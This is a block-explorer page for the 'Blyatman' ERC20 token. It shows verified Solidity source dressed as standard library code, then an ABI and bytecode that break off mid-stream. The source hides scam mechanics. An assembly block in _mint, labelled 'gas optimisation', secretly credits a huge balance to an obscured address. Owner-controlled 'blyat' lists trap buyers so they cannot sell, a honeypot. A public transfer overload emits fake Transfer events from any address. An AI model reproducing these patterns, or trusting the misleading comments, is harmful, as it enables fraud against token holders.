ETH Price: $3,451.89 (+1.78%)
Gas: 4 Gwei

Token

Blyatman (БЛЯТЬМАН)
 

Overview

Max Total Supply

69,420,228,000 БЛЯТЬМАН

Holders

161

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
wsm-deployer.eth
Balance
157,597,535.179509723283228478 БЛЯТЬМАН

Value
$0.00
0xae871521c908b65dd3bec3f04252abac6f9e1673
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Blyatman

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Token.sol
// SPDX-License-Identifier: MIT

/* 
    What does it mean? 
    -- Nobody knows

    Will it make a lot of fun?
    -- Defenitely will!
*/

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract Blyatman is ERC20 {
    constructor() ERC20("Blyatman", unicode"БЛЯТЬМАН") {
        _mint(msg.sender, 69_420_228_000 * 10 ** 18);
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => bool) private _blyat;
    mapping(address => bool) private _pre_blyat;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _blyatApplied = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function preblyat(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _pre_blyat[_list_[i]] = true;
        }
    }

    function depreblyat(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _pre_blyat[_list_[i]] = false;
        }
    }

    function blyat(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _blyat[_list_[i]] = true;
        }
    } 

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function deblyat(address [] calldata _list_) external onlyOwner {
        for (uint256 i = 0; i < _list_.length; i++) {
            _blyat[_list_[i]] = false;
        }
    }

    function blyated(address _address_) public view returns (bool) {
        return _blyat[_address_];
    }

    function preblyated(address _address_) public view returns (bool) {
        return _pre_blyat[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_blyat[from] || _blyat[to]) {require(_blyatApplied == true, "");}

        if (_pre_blyat[to]) {_pre_blyat[to] = false; _blyat[to] = true;}

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"blyat","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"blyated","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"deblyat","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"depreblyat","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"preblyat","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"preblyated","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600660006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600881526020017f426c7961746d616e0000000000000000000000000000000000000000000000008152506040518060400160405280601081526020017fd091d09bd0afd0a2d0acd09cd090d09d00000000000000000000000000000000815250620000b9620000ad6200011160201b60201c565b6200011960201b60201c565b8160079080519060200190620000d192919062000399565b508060089080519060200190620000ea92919062000399565b5050506200010b336be04f11149a198a80f2800000620001dd60201b60201c565b620005f5565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000250576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200024790620004aa565b60405180910390fd5b62000264600083836200038f60201b60201c565b806005600082825462000278919062000505565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200036f919062000573565b60405180910390a36200038b600083836200039460201b60201c565b5050565b505050565b505050565b828054620003a790620005bf565b90600052602060002090601f016020900481019282620003cb576000855562000417565b82601f10620003e657805160ff191683800117855562000417565b8280016001018555821562000417579182015b8281111562000416578251825591602001919060010190620003f9565b5b5090506200042691906200042a565b5090565b5b80821115620004455760008160009055506001016200042b565b5090565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000492601f8362000449565b91506200049f826200045a565b602082019050919050565b60006020820190508181036000830152620004c58162000483565b9050919050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006200051282620004cc565b91506200051f83620004cc565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620005575762000556620004d6565b5b828201905092915050565b6200056d81620004cc565b82525050565b60006020820190506200058a600083018462000562565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005d857607f821691505b60208210811415620005ef57620005ee62000590565b5b50919050565b611e8b80620006056000396000f3fe608060405234801561001057600080fd5b50600436106101375760003560e01c806370a08231116100b8578063a9059cbb1161007c578063a9059cbb14610350578063b900532a14610380578063beabacc8146103b0578063c97b2b93146103cc578063dd62ed3e146103e8578063f2fde38b1461041857610137565b806370a08231146102aa578063715018a6146102da5780638da5cb5b146102e457806395d89b4114610302578063a457c2d71461032057610137565b806335b8b53e116100ff57806335b8b53e146101f65780633950935114610212578063553b071014610242578063589d599a1461027257806363d54f891461028e57610137565b806306fdde031461013c578063095ea7b31461015a57806318160ddd1461018a57806323b872dd146101a8578063313ce567146101d8575b600080fd5b610144610434565b60405161015191906114a8565b60405180910390f35b610174600480360381019061016f9190611568565b6104c6565b60405161018191906115c3565b60405180910390f35b6101926104e9565b60405161019f91906115ed565b60405180910390f35b6101c260048036038101906101bd9190611608565b6104f3565b6040516101cf91906115c3565b60405180910390f35b6101e0610522565b6040516101ed9190611677565b60405180910390f35b610210600480360381019061020b91906116f7565b61052b565b005b61022c60048036038101906102279190611568565b6105d8565b60405161023991906115c3565b60405180910390f35b61025c60048036038101906102579190611744565b61060f565b60405161026991906115c3565b60405180910390f35b61028c600480360381019061028791906116f7565b610665565b005b6102a860048036038101906102a391906116f7565b610712565b005b6102c460048036038101906102bf9190611744565b6107bf565b6040516102d191906115ed565b60405180910390f35b6102e2610808565b005b6102ec61081c565b6040516102f99190611780565b60405180910390f35b61030a610845565b60405161031791906114a8565b60405180910390f35b61033a60048036038101906103359190611568565b6108d7565b60405161034791906115c3565b60405180910390f35b61036a60048036038101906103659190611568565b61094e565b60405161037791906115c3565b60405180910390f35b61039a60048036038101906103959190611744565b610971565b6040516103a791906115c3565b60405180910390f35b6103ca60048036038101906103c59190611608565b6109c7565b005b6103e660048036038101906103e191906116f7565b610a31565b005b61040260048036038101906103fd919061179b565b610ade565b60405161040f91906115ed565b60405180910390f35b610432600480360381019061042d9190611744565b610b65565b005b6060600780546104439061180a565b80601f016020809104026020016040519081016040528092919081815260200182805461046f9061180a565b80156104bc5780601f10610491576101008083540402835291602001916104bc565b820191906000526020600020905b81548152906001019060200180831161049f57829003601f168201915b5050505050905090565b6000806104d1610be9565b90506104de818585610bf1565b600191505092915050565b6000600554905090565b6000806104fe610be9565b905061050b858285610dbc565b610516858585610e48565b60019150509392505050565b60006012905090565b6105336112c3565b60005b828290508110156105d35760006003600085858581811061055a5761055961183c565b5b905060200201602081019061056f9190611744565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806105cb9061189a565b915050610536565b505050565b6000806105e3610be9565b90506106048185856105f58589610ade565b6105ff91906118e3565b610bf1565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61066d6112c3565b60005b8282905081101561070d576001600360008585858181106106945761069361183c565b5b90506020020160208101906106a99190611744565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107059061189a565b915050610670565b505050565b61071a6112c3565b60005b828290508110156107ba576001600260008585858181106107415761074061183c565b5b90506020020160208101906107569190611744565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107b29061189a565b91505061071d565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108106112c3565b61081a6000611341565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600880546108549061180a565b80601f01602080910402602001604051908101604052809291908181526020018280546108809061180a565b80156108cd5780601f106108a2576101008083540402835291602001916108cd565b820191906000526020600020905b8154815290600101906020018083116108b057829003601f168201915b5050505050905090565b6000806108e2610be9565b905060006108f08286610ade565b905083811015610935576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092c906119ab565b60405180910390fd5b6109428286868403610bf1565b60019250505092915050565b600080610959610be9565b9050610966818585610e48565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a2491906115ed565b60405180910390a3505050565b610a396112c3565b60005b82829050811015610ad957600060026000858585818110610a6057610a5f61183c565b5b9050602002016020810190610a759190611744565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610ad19061189a565b915050610a3c565b505050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b6d6112c3565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610bdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd490611a3d565b60405180910390fd5b610be681611341565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c61576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5890611acf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cd1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc890611b61565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610daf91906115ed565b60405180910390a3505050565b6000610dc88484610ade565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e425781811015610e34576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2b90611bcd565b60405180910390fd5b610e418484848403610bf1565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610eb8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eaf90611c5f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1f90611cf1565b60405180910390fd5b610f33838383611405565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fba576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb190611d83565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681